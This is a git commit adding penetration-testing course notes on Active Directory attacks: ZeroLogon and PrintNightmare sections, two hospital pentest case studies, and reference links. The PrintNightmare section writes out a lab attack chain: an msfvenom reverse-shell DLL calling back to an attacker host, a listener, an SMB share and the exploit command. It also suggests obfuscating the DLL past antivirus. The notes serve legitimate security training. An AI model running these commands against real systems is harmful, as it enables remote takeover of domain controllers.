AD notes DONE

syselement · syselement · commit 86e9a2e9dc1e · 2025-02-16T11:57:08.000+01:00
diff --git a/peh/4-active-directory/.gitbook/assets/2025-02-16_10-42-02_887.png b/peh/4-active-directory/.gitbook/assets/2025-02-16_10-42-02_887.png
diff --git a/peh/4-active-directory/5-ad-adv-attacks.md b/peh/4-active-directory/5-ad-adv-attacks.md
@@ -1,2 +1,80 @@
 # AD - Additional Attacks
 
+## ZeroLogon
+
+➡️ [**ZeroLogon**](https://www.trendmicro.com/en_us/what-is/zerologon.html) is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller.
+
+The **Zerologon vulnerability (CVE-2020-1472)** is a critical flaw in Microsoft's **Netlogon Remote Protocol (MS-NRPC)** that affects **Active Directory (AD) domain controllers**. Zerologon allows an unauthenticated attacker with network access to a domain controller to establish a vulnerable Netlogon session and eventually gain domain administrator privileges.
+
+The vulnerability arises from a flaw in the **cryptographic implementation of the Netlogon protocol**, enabling attackers to impersonate any computer, including the root domain controller. By exploiting this, an attacker can effectively take over the entire domain.
+
+This is a very dangerous attack, not worth the risk of running it in a pentest.
+
+- [ZeroLogon testing script](https://github.com/SecuraBV/CVE-2020-1472)
+
+```bash
+mkdir -p $HOME/tcm/peh/ad-attacks/zerologon
+cd $HOME/tcm/peh/ad-attacks/zerologon
+git clone https://github.com/dirkjanm/CVE-2020-1472.git
+wget https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/refs/heads/master/zerologon_tester.py
+
+python3 zerologon_tester.py hydra-dc 192.168.31.90
+```
+
+![](.gitbook/assets/2025-02-16_10-42-02_887.png)
+
+- Proceed with the attack using [dirkjanm/CVE-2020-1472: PoC for Zerologon](https://github.com/dirkjanm/CVE-2020-1472) if the target is vulnerable.
+
+---
+
+## PrintNightmare
+
+> - [Playing with PrintNightmare | 0xdf hacks stuff](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
+
+➡️ The [**PrintNightmare**](https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution) vulnerability refers to critical security flaws in the Windows **Print Spooler service**, identified as **CVE-2021-1675** and **CVE-2021-34527**.
+
+PrintNightmare is a critical **remote code execution** and **local privilege escalation** vulnerability that allows attackers to execute arbitrary code with **SYSTEM** privileges, enabling them to install programs, modify data, or create new accounts with full user rights. **Exploitation can occur remotely or locally**, even on fully patched systems, if certain registry settings are misconfigured. Microsoft has released patches to address these issues, however, systems with specific registry configurations may remain vulnerable.
+
+```bash
+# Impacket
+
+# Scanning
+rpcdump.py @192.168.31.90 | egrep 'MS-RPRN|MS-PAR'
+
+Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
+Protocol: [MS-RPRN]: Print System Remote Protocol
+# DC could be vulnerable
+
+# Attacking
+mkdir -p $HOME/tcm/peh/ad-attacks/printnightmare
+cd $HOME/tcm/peh/ad-attacks/printnightmare
+wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/refs/heads/main/CVE-2021-1675.py
+
+# Open second terminal - Generate dll payload
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=5555 -f dll > shell.dll
+msfconfole
+use multi/handler
+set payload windows/x64/shell_reverse_tcp
+set LPORT 5555
+set LHOST 192.168.31.131
+
+# Open third terminal - setup a file share
+smbserver.py share `pwd` -smb2support
+
+# Run attack
+python3 CVE-2021-1675.py marvel.local/fcastle:Password1@192.168.31.90 '\\192.168.31.131\share\shell.dll'
+```
+
+- The attack was executed on a fully patched **Windows Server 2022**, and if it failed, it is most likely due to the applied security patches.
+- The `dll` may need to be obfuscated to bypass AV detection.
+
+```bash
+# CVE-2021-1675.py output
+[*] Connecting to ncacn_np:192.168.31.90[\PIPE\spoolss]
+[+] Bind OK
+[-] Failed to enumerate remote pDriverPath
+RPRN SessionError: unknown error code: 0x8001011b
+```
+
+---
+
diff --git a/peh/4-active-directory/6-ad-casestudies.md b/peh/4-active-directory/6-ad-casestudies.md
@@ -1 +1,62 @@
-# AD - Case Studies
+# AD - Case Studies
+
+## Case study #1
+
+> - [AD Case Study #1 - You Spent How Much on Security? - TCM Security](https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security/)
+
+This case study details a **penetration test** conducted on a **well-funded U.S. hospital** with a strong security infrastructure, including **IDS/IPS, CyberArk PAM, Symantec Endpoint Security, and proper patch management**. Despite these defenses, testers found **critical security gaps** that could be exploited.
+
+**Key Findings:**
+
+- **SMB Relay Attack Exposure:**
+  - LLMNR/NBNS poisoning was **mitigated**, but **SMB relay attacks** were still possible
+  - Attackers could use **NTLM relaying** to escalate privileges
+- **Privilege Escalation Risks:**
+  - Misconfigurations and local users easy-reused hashes/passwords allowed **privilege escalation**, leading to potential **Domain Admin access**
+  - Weak **Active Directory hardening** left **high-value targets exposed**
+- **Security Investment ≠ Full Protection:**
+  - Even with expensive security solutions, **configuration weaknesses** left the network vulnerable
+  - **Lateral movement & persistence techniques** were viable due to **improper segmentation** and **overprivileged accounts**
+
+**Key Takeaways:**
+
+- **Network segmentation & NTLM hardening** are critical
+- **Regular security assessments** are needed despite high investment in security tools
+- **Least privilege enforcement** should be a priority to prevent escalation
+
+This case study highlights how **misconfigurations and overlooked weaknesses** can lead to **serious security risks**, even in well-funded environments.
+
+---
+
+## Case study #2
+
+> - [AD Case Study #2 - #Pentest Tales #002: Digging Deep - TCM Security](https://tcm-sec.com/pentest-tales-002-digging-deep)
+
+This case study outlines a **penetration test** on a **well-funded U.S. hospital** with solid security measures, including **LLMNR/IPv6 disabled, SMB Signing enforced, IDS/IPS, and patched systems**. Despite these controls, the assessment revealed **critical security gaps** that could be exploited.
+
+**Key Findings:**
+
+- **Default Credentials on Development Apps:**
+  - A **development environment application** was found using **default credentials**, granting unauthorized access.
+  - Attackers could **leverage this access** to extract **sensitive information**.
+- **Local Administrator Password Reuse:**
+  - The **same local admin password** was used across multiple machines.
+  - Once a **single system** was compromised, **lateral movement** became trivial.
+- **WDigest Enabled on Legacy Systems:**
+  - Older systems had **WDigest enabled**, storing **plaintext credentials** in memory.
+  - Attackers could extract **Domain Admin credentials** using tools like **Mimikatz**.
+- **Overprivileged Service Accounts:**
+  - Service accounts had **Domain Admin** privileges unnecessarily.
+  - Compromising one of these accounts **led to full domain compromise**.
+
+**Key Takeaways:**
+
+- **Enforce unique local admin passwords** across endpoints (**LAPS**).
+- **Disable WDigest** on all systems to prevent plaintext credential exposure.
+- **Restrict service account privileges** to the **minimum necessary**.
+- **Regular security assessments** are necessary, even with strong security investments.
+
+This case highlights how **misconfigurations and weak credential management** can undermine otherwise strong defenses, making **lateral movement and domain compromise easy** for attackers.
+
+---
+
diff --git a/peh/peh-references.md b/peh/peh-references.md
@@ -157,49 +157,53 @@
 - [LLMNR Poisoning and How to Prevent It - TCM Security](https://tcm-sec.com/llmnr-poisoning-and-how-to-prevent-it/)
   - [LLMNR | Pentest Everything - viperone.gitbook.io](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/adversary-in-the-middle/llmnr)
   - [Responder](https://github.com/lgandx/Responder)
-  
 - [SMB Relay Attacks and How to Prevent Them - TCM Security](https://tcm-sec.com/smb-relay-attacks-and-how-to-prevent-them/)
   - [ntlmrelayx.py](https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py)
-
 - [mitm6 - compromising IPv4 networks via IPv6 - Fox-IT](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/)
   - [mitm6](https://github.com/dirkjanm/mitm6)
-
 - [How to Hack Through a Pass-Back Attack: MFP Hacking Guide](https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack)+
   - [PRET](https://github.com/RUB-NDS/PRET)
   - [Printer Security Testing Cheat Sheet - Hacking Printers](https://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet)
   - [Praeda](https://github.com/percx/Praeda)
 - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
 - [BloodHound](https://github.com/SpecterOps/BloodHound)
   - [PlumHound](https://github.com/PlumHound/PlumHound)
-
 - [PingCastle](https://www.pingcastle.com/)
 - [Forest Druid](https://www.semperis.com/forest-druid/resources/)
 - [Purple Knight](https://www.semperis.com/purple-knight/resources/)
 - [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)
   - [CrackMapExec Cheat Sheet 2024 (Commands & Examples) - Stationx](https://www.stationx.net/crackmapexec-cheat-sheet/)
 - [netexec](https://github.com/Pennyw0rth/NetExec)
 - [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)
+- [HTB: Cicada | 0xdf hacks stuff](https://0xdf.gitlab.io/2025/02/15/htb-cicada.html#nmap)
 - [Kerberoasting  - CrowdStrike](https://www.crowdstrike.com/cybersecurity-101/kerberoasting/)
   - [Kerberoast | HackTricks](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast)
   - [Kerberoasting | Red Team Notes](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
   - [GetUserSPNs.py](https://github.com/fortra/impacket/blob/master/examples/GetUserSPNs.py)
-
 - [Token Impersonation | Pentest Everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/access-token-manipultion/token-impersonation)
   - [Fun with Incognito - Metasploit Unleashed](https://www.offsec.com/metasploit-unleashed/fun-incognito/)
 - [Forced Authentication | Red Team Notes](https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication)
 - [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences – Active Directory Security](https://adsecurity.org/?p=2288)
   - [MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege: May 13, 2014 - Microsoft Support](https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30)
   - [Exploiting-GPP-AKA-MS14_025-vulnerability](https://github.com/incredibleindishell/Windows-AD-environment-related/blob/master/Exploiting-GPP-AKA-MS14_025-vulnerability/README.md)
   - [GPP attacks | Internal Pentest](https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/gpp-attacks)
-
 - [mimikatz](https://github.com/gentilkiwi/mimikatz)
-
 - [Kerberos Golden Ticket Attack Explained - StationX](https://www.stationx.net/golden-ticket-attack/)
   - [Golden Ticket Attack Explained | Semperis Identity Attack Catalog](https://www.semperis.com/blog/golden-ticket-attack-explained/)
   - [Golden Ticket Attack Explained - MITRE ATT&CK T1558.001](https://www.picussecurity.com/resource/blog/golden-ticket-attack-mitre-t1558.001)
   - [rycon.hu - mimikatz's Golden Ticket](https://rycon.hu/papers/goldenticket.html)
-
-
+- [Zerologon](https://www.secura.com/blog/zero-logon)
+  - [ZeroLogon testing script](https://github.com/SecuraBV/CVE-2020-1472)
+  - [dirkjanm/CVE-2020-1472: PoC for Zerologon](https://github.com/dirkjanm/CVE-2020-1472)
+  - [What Is Zerologon? | Trend Micro (US)](https://www.trendmicro.com/en_us/what-is/zerologon.html)
+
+- [PrintNightmare Exposes Windows Servers to RCE | Huntress](https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution)
+  - [Playing with PrintNightmare | 0xdf hacks stuff](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html)
+  - [cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527](https://github.com/cube0x0/CVE-2021-1675)
+  - [calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)](https://github.com/calebstewart/CVE-2021-1675)
+
+- [AD Case Study #1 - You Spent How Much on Security? - TCM Security](https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security/)
+- [AD Case Study #2 - #Pentest Tales #002: Digging Deep - TCM Security](https://tcm-sec.com/pentest-tales-002-digging-deep)
 
 
 
